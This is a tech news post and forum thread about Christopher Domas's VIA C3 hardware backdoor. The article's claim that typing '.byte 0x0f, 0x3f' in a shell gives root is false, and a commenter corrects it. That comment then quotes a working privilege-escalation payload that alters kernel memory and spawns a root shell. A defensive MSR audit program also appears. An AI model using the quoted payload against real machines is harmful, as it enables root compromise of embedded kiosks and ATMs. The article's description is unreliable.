VIA C3 Processors Compromised by a Simple Shell Command

btarunr

VIA processors probably make up an infinitesimal amount of the desktop PC market-share, and its makers market the chip only at pre-built machines such as digital-signage kiosks, information kiosks, ticket vending machines, ATMs, etc (which don't need a lot of processing power). At the Black Hat 2018 conference, security researcher Christopher Domas discovered that getting access to root privileges in Linux on a machine powered by VIA C3 "Nehemiah" processors is laughably easy. Just key in ".byte 0x0f, 0x3f" (without quotes) in any Linux CLI in user mode, and voila! You are now the root user.

Domas calls this his own iddqd (the cheat-code for "God Mode" in "Doom"). This backdoor, probably put in place by the processor's designers themselves, completely collapses the ring-based privilege system of the operating system, and elevates users and applications from the ring-2 (and above) userspace to ring 0 (root). It is an exploitation of a shadow-core, a hidden RISC processor within C7, which manages the startup, operation, and key storage of the x86 cores. Intel and AMD too have shadow-cores with similar functions.



 

Frick

The things still having these must be truly ancient. Released in 2003, if it's just a Nehemiah thing and not universal to the C cores.
 
" its makers market the chip only at pre-built machines such as digital-signage kiosks, information kiosks, ticket vending machines, ATMs, etc "
Most probably run on XP embedded.
 
FordGT90Concept

So simple and so effective, one has to wonder if this is an unintentional exploit or an intentional backdoor.
 
Honestly, I can only think of three scenarios for this to exist:

1-It was a feature designed for better testing/debugging of engineering samples (for whatever reason), and they forgot to remove it in the final product.
2-Make jumping from any ring to ring 0 much faster (supposedly, jumping from any ring to another is rather expensive), but forgot to add security measures, or the feature got scrapped, and again, forgot to actually remove it.
3-It's an actual backdoor, built specifically for that purpose.
 
> Honestly, I can only think of three scenarios for this to exist:
>
> 1-It was a feature designed for better testing/debugging of engineering samples (for whatever reason), and they forgot to remove it in the final product.
> 2-Make jumping from any ring to ring 0 much faster (supposedly, jumping from any ring to another is rather expensive), but forgot to add security measures, or the feature got scrapped, and again, forgot to actually remove it.
> 3-It's an actual backdoor, built specifically for that purpose.

1 intentional, they didn't forget
2 intentional, never were going to remove or secure it.
3 Government request likely.

IIRC, the chip was supposed to be the next best thing for IoT, until ARM and SoC.
 
Compromised, but how many users use C3?
 
> So simple and so effective, one has to wonder if this is an unintentional exploit or an intentional backdoor.

When it's a dedicated instruction, then it's obviously intentional.
Adding debugging features is very common, and is probably done in every single microchip. But this type of debugging is usually disabled or removed right before mass production, and it's easy to forget something in the final push before a due date.

Still, sometimes they leave stuff there because it's "useful"…
 
This "article" is hilarious.

> Just key in ".byte 0x0f, 0x3f" (without quotes) in any Linux CLI in user mode, and voila! You are now the root user.

No, that is not how it works. This makes it clear that the author has no idea how this exploit functions, and did not do even a minimal amount of research.

The exploit requires three steps:
1) Writing a CPU configuration register with the wrmsr instruction (MSR 1107, bit 0 - Set to 1). This enables the 0x0f3f instruction. This is only possible from within Ring 0 - Except on a certain subset of C3 CPUs which have this bit enabled by default (C3 Samuel 2 - 0x0C5B), which makes the 0x0f3f instruction always available. A trivial mitigation for the latter case is to have the Kernel write this MSR bit to zero as it loads once it knows that it runs on a CPU of the affected family. With this bit disabled, the exploit is not possible. It can likely also be fixed via BIOS or uCode updates, but who is going to bother for a platform or CPU that old.
2) Using the embedded RISC code to execute a series of instructions that would manipulate Linux Kernel memory to escalate your privilege to become root. These instructions will bypass kernel memory protections because they are not active when the RISC core is executing.
3) Launch a shell (which will open as root) to complete the privilege escalation.

This isn't even remotely close to ".byte 0x0f, 0x3f" in the CLI, which will do nothing.

This is the actual payload used for the exploit (source is his DefCon26 presentation):
Code:
/* unlock the backdoor */
__asm__ ("movl $payload, %eax");
__asm__ (".byte 0x0f, 0x3f");
/* modify kernel memory */
__asm__ ("payload:");
__asm__ ("bound %eax,0xa310075b(,%eax,1)");
__asm__ ("bound %eax,0x24120078(,%eax,1)");
__asm__ ("bound %eax,0x80d2c5d0(,%eax,1)");
__asm__ ("bound %eax,0x0a1af97f(,%eax,1)");
__asm__ ("bound %eax,0xc8109489(,%eax,1)");
__asm__ ("bound %eax,0x0a1af97f(,%eax,1)");
__asm__ ("bound %eax,0xc8109c89(,%eax,1)");
__asm__ ("bound %eax,0xc5e998d7(,%eax,1)");
__asm__ ("bound %eax,0xac128751(,%eax,1)");
__asm__ ("bound %eax,0x844475e0(,%eax,1)");
__asm__ ("bound %eax,0x84245de2(,%eax,1)");
__asm__ ("bound %eax,0x8213e5d5(,%eax,1)");
__asm__ ("bound %eax,0x24115f20(,%eax,1)");
__asm__ ("bound %eax,0x2412c133(,%eax,1)");
__asm__ ("bound %eax,0xa2519433(,%eax,1)");
__asm__ ("bound %eax,0x80d2c5d0(,%eax,1)");
__asm__ ("bound %eax,0xc8108489(,%eax,1)");
__asm__ ("bound %eax,0x24120208(,%eax,1)");
__asm__ ("bound %eax,0x80d2c5d0(,%eax,1)");
__asm__ ("bound %eax,0xc8108489(,%eax,1)");
__asm__ ("bound %eax,0x24120000(,%eax,1)");
__asm__ ("bound %eax,0x24110004(,%eax,1)");
__asm__ ("bound %eax,0x80d1c5d0(,%eax,1)");
__asm__ ("bound %eax,0xe01095fd(,%eax,1)");
__asm__ ("bound %eax,0x80d1c5d0(,%eax,1)");
__asm__ ("bound %eax,0xe01095fd(,%eax,1)");
__asm__ ("bound %eax,0x80d1c5d0(,%eax,1)");
__asm__ ("bound %eax,0x80d1c5d0(,%eax,1)");
__asm__ ("bound %eax,0xe0108dfd(,%eax,1)");
__asm__ ("bound %eax,0x80d1c5d0(,%eax,1)");
__asm__ ("bound %eax,0xe0108dfd(,%eax,1)");
/* launch a shell */
system("/bin/bash");

> This backdoor, probably put in place by the processor's designers themselves

Probably? Who else manipulates the RTL for an x86 processor if not the designers themselves? Heck, even if it was a malicious backdoor installed at the request of a government (spoiler: it most likely isn't, so the tinfoil hats can go back into storage), it was still put in place by the designers themselves. Judging by the fact that it was enabled by default only on a subset of the CPUs, this is likely an unfinished feature, or a debug functionality, that was left enabled by default as a result of a mistake. Such unsecured debug feature bugs are extremely common in HW.

> It is an exploitation of a shadow-core, a hidden RISC processor within C7, which manages the startup, operation, and key storage of the x86 cores

Anyway, this core is not the SMM, or any manageability-related core which is what Intel and AMD have been repeatedly lampooned about. It is different, and its functionality is not well understood. It is a core that shares the CPU's execution resources (such as registers), which makes it very special indeed, and what enabled Domas to craft his attack. The one hallway speculation I heard was that this core was intended to be used (ironically) for cryptographic offloads, thus to be used to provide security related features.

EDIT: You can read documentation about this feature in the C3 Datasheet on page 80. Here it is.

Not to mention that this article explains nothing of the process Mr. Domas had to go through to discover this (such as reading through patents, narrowing down to the exact bit that would enable the instruction, reverse-engineering the RISC instruction set of the RISC core, writing an assembler for the RISC core and finally crafting the payload), which is the truly interesting part of the story, and what showcases his genius.

You can see his presentation on the DefCon26 media server (Edit: Fixed link). This is pretty much the same one as presented at Blackhat.
 
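The check behind the mitigation described in step 1 of the post above, as an added example that is not part of the original post or of Domas's material: it reads the register through the Linux msr driver and reports whether bit 0 is set. It assumes the post's "MSR 1107" is hexadecimal 0x1107, that C3 parts report the CPUID vendor string "CentaurHauls", and that /dev/cpu/N/msr is available; the function names are illustrative.

```c
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define VIA_FCR_MSR 0x1107u     /* "MSR 1107" in the post, taken as hex (assumption) */
#define FCR_ALTINST (1ull << 0) /* bit 0: enables the 0x0f 0x3f instruction */

/* Pure helpers, so the same logic can be run over MSR values collected elsewhere. */
static int is_centaur(const char *vendor) { return strcmp(vendor, "CentaurHauls") == 0; }
static int altinst_enabled(uint64_t fcr) { return (fcr & FCR_ALTINST) != 0; }
static uint64_t fcr_hardened(uint64_t fcr) { return fcr & ~FCR_ALTINST; }

/* Read one MSR via the Linux msr driver: the file offset is the MSR index. */
static int read_msr(const char *dev, uint32_t reg, uint64_t *out)
{
    int fd = open(dev, O_RDONLY);
    if (fd < 0) return -1;
    int ok = lseek(fd, (off_t)reg, SEEK_SET) == (off_t)reg &&
             read(fd, out, sizeof *out) == (ssize_t)sizeof *out;
    close(fd);
    return ok ? 0 : -1;
}

/* 1 = bit set (exposed), 0 = other vendor or bit clear, -1 = MSR unreadable. */
static int audit_cpu(const char *vendor, const char *dev, uint64_t *fcr)
{
    if (!is_centaur(vendor))
        return 0;
    if (read_msr(dev, VIA_FCR_MSR, fcr) != 0)
        return -1;
    return altinst_enabled(*fcr);
}

int main(void)
{
    uint64_t fcr = 0;
    /* Vendor is hard-coded for the demo; take it from /proc/cpuinfo in practice. */
    int r = audit_cpu("CentaurHauls", "/dev/cpu/0/msr", &fcr);
    if (r < 0)
        puts("cannot read MSR 0x1107 (needs root and the msr module)");
    else if (r)
        printf("bit 0 set: boot code should write 0x%llx back\n",
               (unsigned long long)fcr_hardened(fcr));
    else
        puts("bit 0 clear");
    return r == 1;
}
```

Run it as root with the msr module loaded; the exit status is 1 when the bit is set.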
Per a detailed Reddit post, the C3 CPU has to be configured first to enable this feature. It's actually documented, and not a hidden thing. Maybe some motherboard vendor accidentally configured things wrong if it's available natively.
 
Worth noting that this is a 17-year-old CPU, not like anyone's gonna be using it on their server or anything lol.
 
> Worth noting that this is a 17-year-old CPU, not like anyone's gonna be using it on their server or anything lol.

You haven't read; these embedded CPUs or systems are still widely used all over the world, that don't need rough CPU power, and work on the mainframe basis (mainframe > client). Many ATMs still operate on embedded systems, VIA was one of them.
 
Since this could affect ATMs, I wonder if this is the cause of the FBI alert to banks this week about a possible ATM cashout attack? (and funny enough, I just did a search and it looks like an Indian bank got hit for over $11 million in unauthorized ATM withdrawals)
 